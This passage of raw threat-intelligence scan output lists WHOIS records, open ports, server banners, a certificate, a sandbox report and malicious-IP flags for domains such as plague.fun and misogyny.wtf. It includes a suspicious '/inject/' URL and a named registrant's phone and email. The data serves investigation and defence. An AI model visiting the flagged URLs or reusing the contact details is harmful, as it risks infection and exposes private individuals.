".tls"\n "nsis7z.dll" has an writable section named ".data"\n "ledger.exe" has an writable section named ".data"\n "ledger.exe" has an writable section named ".ndata"\n "Uninstall Ledger Live.exe" has an writ 172.67.169.215 2022-12-18 00:07:55 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.io plague.fun 2022-12-18 00:25:44 Affiliate - Internet Name No DNS Resolver 1 0 4 0 None ns.dominiando.uk 81.88.48.111 2022-12-18 00:21:47 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b2ce24691b2ada-ORD Content-Encoding: gzip 2606:4700:3032::ac43:8925 2022-12-18 00:09:54 Hosting Provider No Hosting Provider Identifier 0 1 1 0 None Microsoft Azure: http://www.windowsazure.com/en-us/ 40.113.112.131 2022-12-18 00:18:13 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.4:8443 188.114.97.0/24 2022-12-18 00:24:54 Malicious IP Address Yes MetaDefender 0 0 1 0 None webroot.com [4.228.83.86] 4.228.83.86 2022-12-18 00:12:03 Physical Location No ipapi.co 1 0 2 0 None Newark, New Jersey, NJ, United States, US 2606:4700:3031::ac43:93e6 2022-12-18 00:11:12 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: IFU.ONLINE Registry Domain ID: D9964885-CNIC Registrar WHOIS Server: whois.ascio.com Registrar URL: http://www.ascio.com Updated Date: 2022-11-17T12:11:40.0Z Creation Date: 2015-09-04T11:20:25.0Z Registry Expiry Date: 2023-09-04T23:59:59.0Z Registrar: Ascio Technologies Inc. Danmark - filial af Ascio Technologies Inc. USA Registrar IANA ID: 106 Domain Status: ok https://icann.org/epp#ok Registrant Organization: Paul Bueetiger AG Registrant State/Province: Registrant Country: CH Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: NS.HOSTPOINT.CH Name Server: NS2.HOSTPOINT.CH Name Server: NS3.HOSTPOINT.CH DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: abuse@ascio.com Registrar Abuse Contact Phone: +1.4165350123 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:11:12.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain Name: ifu.online Registrar WHOIS Server: whois.ascio.com Registrar URL: http://www.ascio.com Updated Date: 2022-09-05T00:44:30Z Creation Date: 2015-09-04T11:20:25Z Registrar Registration Expiration Date: 2023-09-04T00:00:00Z Registrar: Ascio Technologies, Inc Registrar IANA ID: 106 Registrar Abuse Contact Email: abuse@ascio.com Registrar Abuse Contact Phone: +44 (20) 81583881 Domain Status: OK https://icann.org/epp#ok Registry Registrant ID: Not Disclosed Registrant Name: Not Disclosed Registrant Organization: Not Disclosed Registrant Street: Not Disclosed Registrant City: Not Disclosed Registrant State/Province: Registrant Postal Code: Not Disclosed Registrant Country: CH Registrant Phone: Not Disclosed Registrant Phone Ext: Not Disclosed Registrant Fax: Not Disclosed Registrant Fax Ext: Not Disclosed Registrant Email: https://whoiscontact.ascio.com?domainname=ifu.online Registry Admin ID: Not Disclosed Admin Name: Not Disclosed Admin Organization: Not Disclosed Admin Street: Not Disclosed Admin City: Not Disclosed Admin State/Province: Not Disclosed Admin Postal Code: Not Disclosed Admin Country: Not Disclosed Admin Phone: Not Disclosed Admin Phone Ext: Not Disclosed Admin Fax: Not Disclosed Admin Fax Ext: Not Disclosed Admin Email: Not Disclosed Registry Tech ID: Not Disclosed Tech Name: Not Disclosed Tech Organization: Not Disclosed Tech Street: Not Disclosed Tech City: Not Disclosed Tech State/Province: Not Disclosed Tech Postal Code: Not Disclosed Tech Country: Not Disclosed Tech Phone: Not Disclosed Tech Phone Ext: Not Disclosed Tech Fax: Not Disclosed Tech Fax Ext: Not Disclosed Tech Email: Not Disclosed Name Server: ns.hostpoint.ch Name Server: ns2.hostpoint.ch Name Server: ns3.hostpoint.ch DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: https://icann.org/wicf >>> Last update of WHOIS database: 2022-12-18T00:11:12Z <<< For more information on Whois status codes, please visit https://icann.org/epp The data in Ascio Technologies' WHOIS database is provided by Ascio Technologies for information purposes only. By submitting a WHOIS query, you agree that you will use this data only for lawful purpose. In addition, you agree not to: (a) use the data to allow, enable, or otherwise support any marketing activities, regardless of the medium used. Such media include but are not limited to e-mail, telephone, facsimile, postal mail, SMS, and wireless alerts; or (b) use the data to enable high volume, automated, electronic processes that send queries or data to the systems of any Registry Operator or ICANN-Accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. (c) sell or redistribute the data except insofar as it has been incorporated into a value-added product or service that does not permit the extraction of a substantial portion of the bulk data from the value-added product or service for use by other parties. Ascio Technologies reserves the right to modify these terms at any time. Ascio Technologies cannot guarantee the accuracy of the data provided. By accessing and using Ascio Technologies WHOIS service, you agree to these terms. zerotwo-best-wa.ifu.online 2022-12-18 00:04:52 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://188.114.96.1/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"188.114.96.1:80"\n "104.18.31.78:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_db8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3512"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_db8_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_db8_IE_EarlyTabStart_0x8c0"\n "IsoScope_db8_IE_EarlyTabStart_0x8c0_Mutex"\n "IsoScope_db8_IESQMMUTEX_0_303"\n "IsoScope_db8_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_db8_ConnHashTable<3512>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00003252]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003512]\n "0011OCN4.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0011OCN4.txt]- [targetUID: 00000000-00003512]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003512]\n "~DFEC9FF18591CF0D57.TMP" has type "data"- Location: [%TEMP%\\~DFEC9FF18591CF0D57.TMP]- [targetUID: 00000000-00003512]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003512]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003512]\n "main_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "_71A2FDDC-2FB1-11ED-AFB6-0800275B0CEA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._6747C6ED-2FB1-11ED-AFB6-0800275B0CEA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFFF697D7C0946BAA2.TMP" has type "data"- Location: [%TEMP%\\~DFFF697D7C0946BAA2.TMP]- [targetUID: 00000000-00003512]\n "W9XLKQJM.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W9XLKQJM.txt]- [targetUID: 00000000-00003252]\n "~DF082348EE70E6B95F.TMP" has type "data"- Location: [%TEMP%\\~DF082348EE70E6B95F.TMP]- [targetUID: 00000000-00003512]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://188.114.96.1/"\n Pattern match: "http://188.114.96.1"'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /beacon.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://188.114.96.1/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: performance.radar.cloudflare.com\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_104.18.31.78]'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/88 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "188.114.96.1" found in string "http://188.114.96.1/"\n Potential IP "188.114.96.1" found in string "http://188.114.96.1"\n "188.114.96.1"\n Potential IP "188.114.96.1" found in string "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 188.114.96.1\nDNT: 1\nConnection: Keep-Alive"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'}], u'threat_level': 0, u'size': None, u'job_id': u'631a665717ba8f2f707e8915', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [u'188.114.96.1', u'104.18.31.78'], u'sha256': u'5d930bb75d728b31880a4b3fe975a343b4dfd7855f2a943ba94d6c5bb93a8cfa', u'sha512': u'eb35604cd28c8ce0c80d4c981d47a2cb14198c86708d81ff18d682cb3c8f73b6c54a53fb994dfc82e409c43bf662e908899d1a428a9dc656f1068281ac1049e1', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://188.114.96.1/', u'submission_id': u'631a665717ba8f2f707e8916', u'created_at': u'2022-09-08T22:01:59+00:00', u'filename': None}], u'analysis_start_time': u'2022-09-08T22:02:00+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 2, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 10, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'0f5534822f97323db2ede42413f1e07d', u'network_mode': u'default', u'processes': [], u'sha1': u'd0e743b56365f07fe0e998a2fe5ecf2c66be6187', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 32 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': []}, {u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 0, u'threat_score': None, u'compromised_hosts': [], u'environment_id': None, u'major_os_version': None, u'submit_name': u'http://188.114.96.1/', u'signatures': [], u'threat_level': 0, u'size': None, u'job_id': None, u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [], u'sha256': u'5d930bb75d728b31880a4b3fe975a343b4dfd7855f2a943ba94d6c5bb93a8cfa', u'sha512': u'eb35604cd28c8ce0c80d4c981d47a2cb14198c86708d81ff18d682cb3c8f73b6c54a53fb994dfc82e409c43bf662e908899d1a428a9dc656f1068281ac1049e1 188.114.96.1 2022-12-18 00:03:10 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 04:6b:c5:5a:1c:aa:de:11:25:3a:85:ac:27:46:ac:84:c2:a9 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Oct 30 18:19:31 2022 GMT Not After : Jan 28 18:19:30 2023 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:01:01:6e:30:77:4b:4a:76:be:97:94:3e:d7:af: bb:89:fe:9f:c9:f2:e8:ed:d4:13:6a:74:bb:54:79: b8:27:6d:90:01:e0:be:5d:f9:e8:61:3e:d3:8e:13: 0b:c0:e3:b9:e9:81:3b:d6:d1:80:50:6a:0e:80:e2: e7:bc:d5:ec:5b ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: E9:2C:D8:38:4D:A7:AE:7E:D2:DB:0C:69:89:B1:06:B2:70:BB:A0:0E X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA384 30:65:02:31:00:8a:13:86:00:52:1a:c1:0d:64:4c:3a:d0:7d: ad:a3:1f:3d:77:c0:7b:e0:38:7d:8a:d1:13:d1:2c:4d:d8:d3: 55:c4:42:b5:2c:66:8f:c9:c6:58:d2:35:f0:54:a9:b1:fa:02: 30:03:c9:aa:f7:e7:41:d6:3c:a5:0a:5a:1b:57:5a:06:d4:2b: b1:c3:23:17:ba:be:0f:99:c0:9a:36:c9:f2:ce:f3:30:3e:9e: a0:05:0c:ae:61:ce:b0:e0:07:94:04:30:53 2022-12-18 00:09:14 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.2:8080 188.114.96.0/24 2022-12-18 00:10:04 Linked URL - Internal No URLScan.io 0 0 1 0 None http://misogyny.wtf/inject/UsRjS959Rqm4sPG4 misogyny.wtf 2022-12-18 00:21:20 Open TCP Port No Censys 0 0 2 0 None 188.114.97.1:443 188.114.97.1 2022-12-18 00:08:28 Open TCP Port No Pulsedive 0 0 3 0 None 81.88.52.222:21 81.88.52.222 2022-12-18 00:09:41 Co-Hosted Site No HackerTarget 0 0 2 0 None acnscrt.rcvry.workers.dev 172.67.147.230 2022-12-18 00:26:44 Physical Location No MetaDefender 0 0 2 0 None Kansas City, United States 34.149.204.188 2022-12-18 00:21:34 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77ae417d4f861cda-ORD Content-Encoding: gzip 104.21.19.243 2022-12-18 00:19:10 Hosting Provider No Hosting Provider Identifier 0 0 3 0 None register.it: http://we.register.it/ 81.88.48.101 2022-12-18 00:21:37 Netblock Membership No Censys 0 0 2 0 None 20.192.0.0/10 20.226.83.185 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 20:35:09 (Net ID: 00:02:2D:05:BE:2A) 37.780462,-122.390564 2022-12-18 00:21:09 Open TCP Port No Censys 0 0 2 0 None 188.114.96.0:8080 188.114.96.0 2022-12-18 00:12:49 Physical Location No ipapi.co 0 0 2 0 None Amsterdam, North Holland, NH, Netherlands, NL 188.114.97.9 2022-12-18 00:20:39 Physical Location No Censys 1 0 1 0 None Campinas, Sao Paulo, Brazil, South America 20.195.209.219 2022-12-18 00:09:52 Co-Hosted Site No HackerTarget 0 0 2 0 None blogcast.support 172.67.147.230 2022-12-18 00:21:13 Open TCP Port No Censys 0 0 2 0 None 188.114.97.0:443 188.114.97.0 2022-12-18 00:21:20 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Server: cloudflare Date: Content-Type: text/html Content-Length: 151 Connection: keep-alive CF-RAY: 77aa4b011c318178-ORD 188.114.97.1 2022-12-18 00:26:58 Affiliate - Company Name No Company Name Extractor 0 0 7 0 None Registry Services, LLC Domain Name: dominiando.us Registry Domain ID: D19621490-US Registrar WHOIS Server: Registrar URL: https://key-systems.net Updated Date: 2022-06-06T00:00:06Z Creation Date: 2009-04-22T11:21:03Z Registry Expiry Date: 2023-04-21T23:59:59Z Registrar: Key-Systems GmbH Registrar IANA ID: 269 Registrar Abuse Contact Email: abuse@key-systems.net Registrar Abuse Contact Phone: +49.6894939685 Domain Status: ok https://icann.org/epp#ok Registry Registrant ID: C19621489-US Registrant Name: Francesco Pacaccio Registrant Organization: Dominiando Srl Registrant Street: Piazzale Clodio 8 Registrant Street: Registrant Street: Registrant City: Roma Registrant State/Province: Registrant Postal Code: 00195 Registrant Country: IT Registrant Phone: +39.068072248 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: domini@dominiando.it Registrant Application Purpose: P1 Registrant Nexus Category: C31/IT Registry Admin ID: C19621489-US Admin Name: Francesco Pacaccio Admin Organization: Dominiando Srl Admin Street: Piazzale Clodio 8 Admin Street: Admin Street: Admin City: Roma Admin State/Province: Admin Postal Code: 00195 Admin Country: IT Admin Phone: +39.068072248 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: domini@dominiando.it Admin Application Purpose: P1 Admin Nexus Category: C31/IT Registry Tech ID: C2262438-US Tech Name: Domain Management Tech Organization: Dominiando Srl Tech Street: Piazzale Clodio 8 Tech Street: Tech Street: Tech City: Rome Tech State/Province: IT Tech Postal Code: 00195 Tech Country: IT Tech Phone: +39.0680693248 Tech Phone Ext: Tech Fax: +39.06233200178 Tech Fax Ext: Tech Email: domini@dominiando.it Tech Application Purpose: P1 Tech Nexus Category: C31/IT Name Server: ns.dominiando.it Name Server: ns.dominiando.asia Name Server: ns.dominiando.uk Name Server: ns.dominiando.us DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:26:49Z <<< For more information on Whois status codes, please visit https://icann.org/epp .US WHOIS Complaint Tool - http://www.whoiscomplaints.us Advanced WHOIS Instructions - http://whois.us/help.html Registry Services, LLC, the Registry Administrator for .US, has collected this information for the WHOIS database through a .US-Accredited Registrar. This information is provided to you for informational purposes only and is designed to assist persons in determining contents of a domain name registration record in the registry database. Registry Services, LLC makes this information available to you "as is" and does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data: (1) to allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone; (2) in contravention of any applicable data and privacy protection laws; or (3) to enable high volume, automated, electronic processes that apply to the registry (or its systems). Compilation, repackaging, dissemination, or other use of the WHOIS database in its entirety, or of a substantial portion thereof, is not allowed without our prior written permission. We reserve the right to modify or change these conditions at any time without prior or subsequent notification of any kind. By executing this query, in any manner whatsoever, you agree to abide by these terms. NOTE: FAILURE TO LOCATE A RECORD IN THE WHOIS DATABASE IS NOT INDICATIVE OF THE AVAILABILITY OF A DOMAIN NAME. All domain names are subject to certain additional domain name registration rules. For details, please visit our site at www.whois.us. 2022-12-18 00:02:54 Domain Registrar No Whois 0 0 1 0 None ENOM, INC. zerotwo-best-waifu.online 2022-12-18 00:12:04 Country No Country Name Extractor 0 0 3 0 None United States registrar-servers.com 2022-12-18 00:03:05 Domain Name No DNS Resolver 0 0 1 0 None rasputain.fr rasputain.fr 2022-12-18 00:09:27 Physical Location No LeakIX 0 0 2 0 None Kansas City, Missouri, United States 34.149.204.188 2022-12-18 00:04:01 Country No Country Name Extractor 0 0 2 0 None France Domain Name: ZEROTWO-BEST-WAIFU.ONLINE Registry Domain ID: D266274377-CNIC Registrar WHOIS Server: whois.enom.com Registrar URL: https://www.enom.com/ Updated Date: 2022-01-11T15:03:40.0Z Creation Date: 2021-12-25T22:42:25.0Z Registry Expiry Date: 2022-12-25T23:59:59.0Z Registrar: eNom, Inc. Registrar IANA ID: 48 Domain Status: ok https://icann.org/epp#ok Registrant Organization: Data Protected Registrant State/Province: WA Registrant Country: US Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: NS1.AMENWORLD.COM Name Server: NS2.AMENWORLD.COM DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: domainabuse@tucows.com Registrar Abuse Contact Phone: +49.2283296859 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:53.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain Name: zerotwo-best-waifu.online Registry Domain ID: D266274377-CNIC Registrar WHOIS Server: WHOIS.ENOM.COM Registrar URL: WWW.ENOM.COM Updated Date: 2022-01-11T15:03:40.00Z Creation Date: 2021-12-25T22:42:00.00Z Registrar Registration Expiration Date: 2022-12-25T23:59:59.00Z Registrar: ENOM, INC. Registrar IANA ID: 48 Domain Status: ok https://www.icann.org/epp#ok Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Paris Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: FR Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Email: https://tieredaccess.com/contact/0b66922f-87a6-44e9-a979-1158d3dacd13 Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Email: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Email: REDACTED FOR PRIVACY Name Server: NS1.AMENWORLD.COM Name Server: NS2.AMENWORLD.COM DNSSEC: unsigned Registrar Abuse Contact Email: ABUSE@ENOM.COM Registrar Abuse Contact Phone: +1.4259744689 URL of the ICANN WHOIS Data Problem Reporting System: HTTP://WDPRS.INTERNIC.NET/ >>> Last update of WHOIS database: 2022-12-18T00:02:53.00Z <<< For more information on Whois status codes, please visit https://icann.org/epp The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. We make this information available "as is," and do not guarantee its accuracy. By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data 